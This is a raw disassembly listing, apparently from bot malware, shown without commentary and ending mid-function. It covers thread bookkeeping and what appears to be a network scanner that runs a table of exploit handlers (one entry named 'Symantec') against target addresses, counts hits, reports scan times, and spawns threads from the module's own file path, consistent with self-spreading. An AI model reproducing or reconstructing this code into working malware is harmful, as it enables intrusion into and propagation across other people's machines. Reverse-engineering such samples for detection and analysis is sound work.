var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_40B1B4
push [ebp+var_14]
call sub_40B413
add esp, 14h
push 0
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_40B162 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B1B4 proc near ; CODE XREF: sub_40B162+38�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_431A80
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
xor edi, edi
mov esi, offset dword_43E390
loc_40B1DE: ; CODE XREF: sub_40B1B4+78�j
cmp byte ptr [esi], 0
jz short loc_40B21F
cmp [ebp+arg_C], 0
jnz short loc_40B1F2
cmp dword ptr [esi+204h], 0
jnz short loc_40B21F
loc_40B1F2: ; CODE XREF: sub_40B1B4+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 24h
loc_40B21F: ; CODE XREF: sub_40B1B4+2D�j
; sub_40B1B4+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4CB390
jl short loc_40B1DE
pop edi
pop esi
leave
retn
sub_40B1B4 endp
; =============== S U B R O U T I N E =======================================
sub_40B232 proc near ; CODE XREF: sub_401ACD+7BA5�p
; sub_40B2C0+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_40B2BA
cmp esi, 400h
jge short loc_40B2BA
imul esi, 234h
push edi
push ebx
push dword_43E5A4[esi]
lea edi, dword_43E5A4[esi]
call dword_4270AC ; TerminateThread
cmp [edi], ebx
jz short loc_40B26A
push 1
pop ebp
loc_40B26A: ; CODE XREF: sub_40B232+33�j
mov [edi], ebx
lea edi, dword_43E598[esi]
mov dword_43E590[esi], ebx
mov dword_43E594[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_40B28B
push eax
call sub_4199CA
pop ecx
loc_40B28B: ; CODE XREF: sub_40B232+50�j
mov [edi], ebx
lea edi, dword_43E59C[esi]
mov byte ptr dword_43E390[esi], bl
mov byte_43E5A8[esi], bl
push dword ptr [edi]
call ds:dword_4CB6EC ; closesocket
lea esi, dword_43E5A0[esi]
mov [edi], ebx
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
mov [esi], ebx
pop edi
loc_40B2BA: ; CODE XREF: sub_40B232+D�j
; sub_40B232+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_40B232 endp
; =============== S U B R O U T I N E =======================================
sub_40B2C0 proc near ; CODE XREF: sub_40111D+18�p
; sub_401221:loc_4017D9�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_43E390
loc_40B2CC: ; CODE XREF: sub_40B2C0+2A�j
cmp byte ptr [esi], 0
jz short loc_40B2DD
push edi
call sub_40B232
test eax, eax
pop ecx
jz short loc_40B2DD
inc ebx
loc_40B2DD: ; CODE XREF: sub_40B2C0+F�j
; sub_40B2C0+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4CB390
jl short loc_40B2CC
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B2C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2F2 proc near ; CODE XREF: sub_401ACD+418F�p
; sub_401ACD+42E1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_43E594
loc_40B306: ; CODE XREF: sub_40B2F2+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40B328
test edi, edi
jle short loc_40B31A
cmp [esi], edi
jz short loc_40B31A
cmp ebx, edi
jnz short loc_40B328
loc_40B31A: ; CODE XREF: sub_40B2F2+1E�j
; sub_40B2F2+22�j
push ebx
call sub_40B232
test eax, eax
pop ecx
jz short loc_40B328
inc [ebp+var_4]
loc_40B328: ; CODE XREF: sub_40B2F2+1A�j
; sub_40B2F2+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4CB594
jl short loc_40B306
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40B2F2 endp
; =============== S U B R O U T I N E =======================================
sub_40B33F proc near ; CODE XREF: sub_401221+40F�p
; sub_401ACD+97A�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_43E590
loc_40B346: ; CODE XREF: sub_40B33F+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40B34F
inc eax
loc_40B34F: ; CODE XREF: sub_40B33F+D�j
add ecx, 234h
cmp ecx, offset dword_4CB590
jl short loc_40B346
retn
sub_40B33F endp
; =============== S U B R O U T I N E =======================================
sub_40B35E proc near ; CODE XREF: sub_401ACD+2434�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_43E590
loc_40B368: ; CODE XREF: sub_40B35E+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_40B381
add ecx, 234h
inc edx
cmp ecx, offset dword_4CB590
jl short loc_40B368
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B381: ; CODE XREF: sub_40B35E+10�j
mov eax, edx
pop esi
retn
sub_40B35E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B385 proc near ; CODE XREF: sub_401ACD+1067�p
; sub_401ACD+126D�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_40B39E
push [ebp+arg_1C]
call sub_41B779
pop ecx
loc_40B39E: ; CODE XREF: sub_40B385+E�j
push eax
push [ebp+arg_18]
call sub_40B2F2
pop ecx
test eax, eax
pop ecx
jle short loc_40B3CA
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)"
push eax
call sub_41B886
add esp, 14h
jmp short loc_40B3E4
; ---------------------------------------------------------------------------
loc_40B3CA: ; CODE XREF: sub_40B385+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s No %s thread found."
push eax
call sub_41B886
add esp, 10h
loc_40B3E4: ; CODE XREF: sub_40B385+43�j
cmp [ebp+arg_C], 0
jnz short loc_40B404
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_40B404: ; CODE XREF: sub_40B385+63�j
lea eax, [ebp+var_200]
push eax
call sub_4151AD
pop ecx
leave
retn
sub_40B385 endp
; =============== S U B R O U T I N E =======================================
sub_40B413 proc near ; CODE XREF: sub_4017ED+159�p
; sub_40B162+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_43E5A4[eax], ecx
mov dword_43E590[eax], ecx
mov dword_43E594[eax], ecx
mov dword_43E598[eax], ecx
mov dword_43E59C[eax], ecx
mov dword_43E5A0[eax], ecx
mov byte ptr dword_43E390[eax], cl
mov byte_43E5A8[eax], cl
retn
sub_40B413 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B450 proc near ; CODE XREF: sub_401ACD+7E3C�p
; sub_40B57E+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_40B45A: ; CODE XREF: sub_40B450+68�j
mov cl, [esi]
test cl, cl
jz short loc_40B4BA
cmp eax, 1
jnz short loc_40B4BA
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40B4BA
cmp cl, 2Ah
jz short loc_40B4A1
cmp cl, 3Fh
jz short loc_40B484
cmp cl, 5Bh
jz short loc_40B489
xor eax, eax
cmp cl, dl
setz al
loc_40B484: ; CODE XREF: sub_40B450+26�j
inc [ebp+arg_4]
jmp short loc_40B4B4
; ---------------------------------------------------------------------------
loc_40B489: ; CODE XREF: sub_40B450+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_40B4E6
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40B4B4
; ---------------------------------------------------------------------------
loc_40B4A1: ; CODE XREF: sub_40B450+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40B57E
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_40B4B4: ; CODE XREF: sub_40B450+37�j
; sub_40B450+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_40B45A
; ---------------------------------------------------------------------------
loc_40B4BA: ; CODE XREF: sub_40B450+E�j
; sub_40B450+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_40B4CA
cmp eax, 1
jnz short loc_40B4E1
inc esi
mov [ebp+arg_0], esi
jmp short loc_40B4BA
; ---------------------------------------------------------------------------
loc_40B4CA: ; CODE XREF: sub_40B450+6D�j
cmp eax, 1
jnz short loc_40B4E1
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_40B4E1
cmp byte ptr [esi], 0
jnz short loc_40B4E1
push 1
pop eax
jmp short loc_40B4E3
; ---------------------------------------------------------------------------
loc_40B4E1: ; CODE XREF: sub_40B450+72�j
; sub_40B450+7D�j ...
xor eax, eax
loc_40B4E3: ; CODE XREF: sub_40B450+8F�j
pop esi
pop ebp
retn
sub_40B450 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4E6 proc near ; CODE XREF: sub_40B450+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_40B507
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_40B507: ; CODE XREF: sub_40B4E6+19�j
push ebx
push esi
loc_40B509: ; CODE XREF: sub_40B4E6+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_40B517
cmp [ebp+var_4], eax
jnz short loc_40B563
loc_40B517: ; CODE XREF: sub_40B4E6+2A�j
test edi, edi
jnz short loc_40B558
cmp bl, 2Dh
jnz short loc_40B54C
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_40B54C
cmp al, 5Dh
jz short loc_40B54C
cmp [ebp+var_4], edi
jnz short loc_40B54C
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_40B558
cmp bl, al
jg short loc_40B558
push 1
mov [edx], esi
pop edi
jmp short loc_40B558
; ---------------------------------------------------------------------------
loc_40B54C: ; CODE XREF: sub_40B4E6+38�j
; sub_40B4E6+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_40B558
push 1
pop edi
loc_40B558: ; CODE XREF: sub_40B4E6+33�j
; sub_40B4E6+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_40B509
; ---------------------------------------------------------------------------
loc_40B563: ; CODE XREF: sub_40B4E6+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_40B570
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40B570: ; CODE XREF: sub_40B4E6+82�j
cmp edi, eax
jnz short loc_40B579
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_40B579: ; CODE XREF: sub_40B4E6+8C�j
mov eax, edi
pop edi
leave
retn
sub_40B4E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B57E proc near ; CODE XREF: sub_40B450+59�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
xor ebx, ebx
loc_40B59A: ; CODE XREF: sub_40B57E+3A�j
cmp [eax], bl
jz short loc_40B5BA
mov cl, [ecx]
cmp cl, 3Fh
jz short loc_40B5AF
cmp cl, 2Ah
jnz short loc_40B5BA
cmp cl, 3Fh
jnz short loc_40B5B2
loc_40B5AF: ; CODE XREF: sub_40B57E+25�j
inc eax
mov [edi], eax
loc_40B5B2: ; CODE XREF: sub_40B57E+2F�j
inc dword ptr [esi]
mov ecx, [esi]
mov eax, [edi]
jmp short loc_40B59A
; ---------------------------------------------------------------------------
loc_40B5BA: ; CODE XREF: sub_40B57E+1E�j
; sub_40B57E+2A�j ...
mov eax, [esi]
cmp byte ptr [eax], 2Ah
jnz short loc_40B5C5
inc dword ptr [esi]
jmp short loc_40B5BA
; ---------------------------------------------------------------------------
loc_40B5C5: ; CODE XREF: sub_40B57E+41�j
mov eax, [edi]
mov cl, [eax]
cmp cl, bl
jnz short loc_40B5E6
mov edx, [esi]
cmp [edx], bl
jz short loc_40B5D7
xor eax, eax
jmp short loc_40B646
; ---------------------------------------------------------------------------
loc_40B5D7: ; CODE XREF: sub_40B57E+53�j
cmp cl, bl
jnz short loc_40B5E6
mov ecx, [esi]
cmp [ecx], bl
jnz short loc_40B5E6
push 1
pop eax
jmp short loc_40B646
; ---------------------------------------------------------------------------
loc_40B5E6: ; CODE XREF: sub_40B57E+4D�j
; sub_40B57E+5B�j ...
push eax
push dword ptr [esi]
call sub_40B450
pop ecx
test eax, eax
pop ecx
jnz short loc_40B630
loc_40B5F4: ; CODE XREF: sub_40B57E+B0�j
inc dword ptr [edi]
mov eax, [edi]
loc_40B5F8: ; CODE XREF: sub_40B57E+90�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jz short loc_40B610
cmp cl, 5Bh
jz short loc_40B610
cmp dl, bl
jz short loc_40B610
inc eax
mov [edi], eax
jmp short loc_40B5F8
; ---------------------------------------------------------------------------
loc_40B610: ; CODE XREF: sub_40B57E+82�j
; sub_40B57E+87�j ...
mov eax, [edi]
cmp [eax], bl
jz short loc_40B627
push eax
push dword ptr [esi]
call sub_40B450
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B62C
; ---------------------------------------------------------------------------
loc_40B627: ; CODE XREF: sub_40B57E+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40B62C: ; CODE XREF: sub_40B57E+A7�j
cmp eax, ebx
jnz short loc_40B5F4
loc_40B630: ; CODE XREF: sub_40B57E+74�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_40B643
mov eax, [esi]
cmp [eax], bl
jnz short loc_40B643
mov [ebp+var_4], 1
loc_40B643: ; CODE XREF: sub_40B57E+B6�j
; sub_40B57E+BC�j
mov eax, [ebp+var_4]
loc_40B646: ; CODE XREF: sub_40B57E+57�j
; sub_40B57E+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_40B57E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B64B proc near ; CODE XREF: sub_401ACD+2AF6�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_431E9C
push eax
xor ebx, ebx
call sub_41B886
cmp dword_431B00, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40B6BD
push esi
mov esi, offset dword_431B08
loc_40B67E: ; CODE XREF: sub_40B64B+6F�j
mov eax, [esi]
test eax, eax
jbe short loc_40B6B3
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset dword_431E90
push eax
call sub_41B886
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_41C1E0
add esp, 1Ch
loc_40B6B3: ; CODE XREF: sub_40B64B+37�j
add esi, 40h
cmp dword ptr [esi-8], 0
jnz short loc_40B67E
pop esi
loc_40B6BD: ; CODE XREF: sub_40B64B+2B�j
push ds:dword_4CB394
call sub_41A88C
pop ecx
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_41B886
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_41C1E0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_200]
push eax
call sub_4151AD
add esp, 34h
pop edi
pop ebx
leave
retn
sub_40B64B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B71A proc near ; CODE XREF: sub_401ACD+2AE0�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, ds:dword_4CE160
mov ecx, ds:dword_4CE15C
push esi
push ds:dword_4CB394
lea esi, [ecx+eax]
call sub_41A88C
pop ecx
push eax
push esi
push ds:dword_4CE160
lea eax, [ebp+var_200]
push ds:dword_4CE15C
push offset unk_431EBC
push eax
call sub_41B886
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_200]
push eax
call sub_4151AD
add esp, 30h
pop esi
leave
retn
sub_40B71A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B786 proc near ; CODE XREF: sub_401ACD+2ACA�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push ds:dword_4CB394
call sub_41A88C
pop ecx
push eax
lea eax, [ebp+var_200]
push ds:dword_4CE3A4
push offset unk_431F04
push eax
call sub_41B886
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_200]
push eax
call sub_4151AD
add esp, 28h
leave
retn
sub_40B786 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B7DB proc near ; CODE XREF: sub_401ACD+2AB4�p
var_1000 = byte ptr -1000h
var_800 = byte ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_41BB20
push edi
lea eax, [ebp+var_800]
push offset dword_431F50
push eax
call sub_41B886
cmp dword_431B00, 0
pop ecx
pop ecx
mov edi, 800h
jz short loc_40B847
push esi
mov esi, offset aSymantec ; "Symantec"
loc_40B810: ; CODE XREF: sub_40B7DB+69�j
lea eax, [esi-0Ah]
push eax
push esi
lea eax, [ebp+var_1000]
push offset dword_431F40
push eax
call sub_41B886
lea eax, [ebp+var_1000]
push edi
push eax
lea eax, [ebp+var_800]
push eax
call sub_41C1E0
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi+1Eh], 0
jnz short loc_40B810
pop esi
loc_40B847: ; CODE XREF: sub_40B7DB+2D�j
push ds:dword_4CB394
call sub_41A88C
pop ecx
push eax
lea eax, [ebp+var_1000]
push offset aScanTimeS_ ; " Scan Time: %s."
push eax
call sub_41B886
lea eax, [ebp+var_1000]
push edi
push eax
lea eax, [ebp+var_800]
push eax
call sub_41C1E0
push 0
lea eax, [ebp+var_800]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_800]
push eax
call sub_4151AD
add esp, 30h
pop edi
leave
retn
sub_40B7DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B8A2 proc near ; DATA XREF: sub_401ACD+30E1�o
var_3F0 = byte ptr -3F0h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1DC = byte ptr -1DCh
var_15C = byte ptr -15Ch
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_134 = byte ptr -134h
var_124 = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3F0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Bh
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
mov dword ptr [eax+128h], 1
lea eax, [ebp+var_134]
push eax
call ds:dword_4CB694 ; inet_addr
xor edi, edi
mov [ebp+var_8], eax
cmp dword_431B00, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], edi
jz loc_40BA04
mov ebx, offset dword_431B00
mov eax, ebx
loc_40B8F3: ; CODE XREF: sub_40B8A2+15C�j
push [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_8]
call sub_40C088
add esp, 0Ch
cmp eax, 1
jnz loc_40B9F4
push dword ptr [ebx]
lea esi, [ebx-28h]
lea eax, [ebp+var_134]
push eax
lea eax, [esi+0Ah]
push eax
lea eax, [ebp+var_3F0]
push offset unk_431FA0
push eax
call sub_41B886
push edi
lea eax, [ebp+var_3F0]
push [ebp+var_14]
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_24]
call sub_409A73
lea eax, [ebp+var_3F0]
push eax
call sub_4151AD
add esp, 2Ch
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_1EC]
push eax
call sub_41B886
pop ecx
lea eax, [ebp+var_15C]
pop ecx
push esi
push eax
call sub_41B886
cmp [ebp+var_A4], 0
pop ecx
pop ecx
lea eax, [ebp+var_A4]
jnz short loc_40B98F
lea eax, [ebp+var_124]
loc_40B98F: ; CODE XREF: sub_40B8A2+E5�j
push eax
lea eax, [ebp+var_1DC]
push eax
call sub_41B886
mov eax, [ebp+var_24]
pop ecx
mov [ebp+var_1F0], eax
mov eax, [ebp+var_14]
mov [ebp+var_140], eax
mov eax, [ebp+var_10]
pop ecx
mov [ebp+var_13C], eax
mov eax, [ebx]
sub esp, 0BCh
mov [ebp+var_150], eax
mov eax, [ebp+var_18]
push 2Fh
mov [ebp+var_14C], eax
mov eax, [ebp+arg_0]
pop ecx
lea esi, [ebp+var_1F0]
mov edi, esp
mov [ebp+var_148], eax
rep movsd
call dword ptr [ebx+4]
add esp, 0BCh
inc [ebp+var_4]
xor edi, edi
loc_40B9F4: ; CODE XREF: sub_40B8A2+64�j
inc [ebp+arg_0]
add ebx, 40h
mov eax, ebx
cmp [ebx], edi
jnz loc_40B8F3
loc_40BA04: ; CODE XREF: sub_40B8A2+44�j
push [ebp+var_4]
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_3F0]
push offset unk_431F6C
push eax
call sub_41B886
push edi
lea eax, [ebp+var_3F0]
push [ebp+var_14]
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_24]
call sub_409A73
lea eax, [ebp+var_3F0]
push eax
call sub_4151AD
push [ebp+var_18]
call sub_40B413
add esp, 2Ch
push edi
call dword_4270CC ; ExitThread
sub_40B8A2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA57 proc near ; CODE XREF: sub_401ACD+244F�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 0Bh
call sub_40B33F
test eax, eax
pop ecx
jle short loc_40BA93
mov eax, [ebp+arg_C]
push ds:dword_4CB7A0[eax*8]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_431FF0
push eax
call sub_41B886
add esp, 0Ch
jmp short loc_40BAA6
; ---------------------------------------------------------------------------
loc_40BA93: ; CODE XREF: sub_40BA57+13�j
lea eax, [ebp+var_200]
push offset unk_431FD0
push eax
call sub_41B886
pop ecx
pop ecx
loc_40BAA6: ; CODE XREF: sub_40BA57+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
lea eax, [ebp+var_200]
push eax
call sub_4151AD
add esp, 18h
leave
retn
sub_40BA57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BACE proc near ; CODE XREF: sub_40C33D+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_40BFA0
shl eax, 6
xor ebx, ebx
cmp dword_431B0C[eax], ebx
jz loc_40BFA0
push 5
call sub_40B33F
test eax, eax
pop ecx
jnz loc_40BD55
mov eax, dword_429078
push edi
mov esi, offset dword_4CD85C
push 104h
push esi
push ebx
mov ds:dword_4CDA6C, eax
mov ds:dword_4CDA68, ebx
call dword_427070 ; GetModuleFileNameA
mov edi, offset byte_429110
push 103h
push edi
push offset dword_4CD960
call sub_41B5F0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_4CD858, eax
mov eax, [ebp+arg_138]
push 7Fh
mov ds:dword_4CDAF0, eax
jnz short loc_40BB81
lea eax, [ebp+arg_10]
push eax
push offset dword_4CDA70
call sub_41B5F0
add esp, 0Ch
mov ds:dword_4CDAF4, 1
jmp short loc_40BB9B
; ---------------------------------------------------------------------------
loc_40BB81: ; CODE XREF: sub_40BACE+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4CDA70
call sub_41B5F0
add esp, 0Ch
mov ds:dword_4CDAF4, ebx
loc_40BB9B: ; CODE XREF: sub_40BACE+B1�j
push esi
lea eax, [ebp+var_204]
push ds:dword_4CDA6C
push offset unk_42C55C
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_40B0F7
add esp, 1Ch
mov ds:dword_4CDA64, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CD858
push offset sub_411797
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, ds:dword_4CDA64
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40BC09
loc_40BBF7: ; CODE XREF: sub_40BACE+139�j
cmp ds:dword_4CDAF8, ebx
jnz short loc_40BC24
push 32h
call dword_427078 ; Sleep
jmp short loc_40BBF7
; ---------------------------------------------------------------------------
loc_40BC09: ; CODE XREF: sub_40BACE+127�j
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_432110
push eax
call sub_41B886
add esp, 0Ch
loc_40BC24: ; CODE XREF: sub_40BACE+12F�j
lea eax, [ebp+var_204]
push eax
call sub_4151AD
mov eax, ds:dword_4CB390
mov esi, offset dword_4CDB04
mov [esp+210h+var_210], 104h
push esi
push ebx
mov ds:dword_4CDD14, eax
mov ds:dword_4CDD10, ebx
call dword_427070 ; GetModuleFileNameA
push 103h
push edi
push offset dword_4CDC08
call sub_41B5F0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_4CDB00, eax
mov eax, [ebp+arg_138]
pop edi
mov ds:dword_4CDD98, eax
push 7Fh
jnz short loc_40BCA5
lea eax, [ebp+arg_10]
push eax
push offset dword_4CDD18
call sub_41B5F0
add esp, 0Ch
mov ds:dword_4CDD9C, 1
jmp short loc_40BCBF
; ---------------------------------------------------------------------------
loc_40BCA5: ; CODE XREF: sub_40BACE+1B8�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4CDD18
call sub_41B5F0
add esp, 0Ch
mov ds:dword_4CDD9C, ebx
loc_40BCBF: ; CODE XREF: sub_40BACE+1D5�j
push esi
lea eax, [ebp+var_204]
push ds:dword_4CDD14
push offset unk_4320DC
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_204]
push 4
push eax
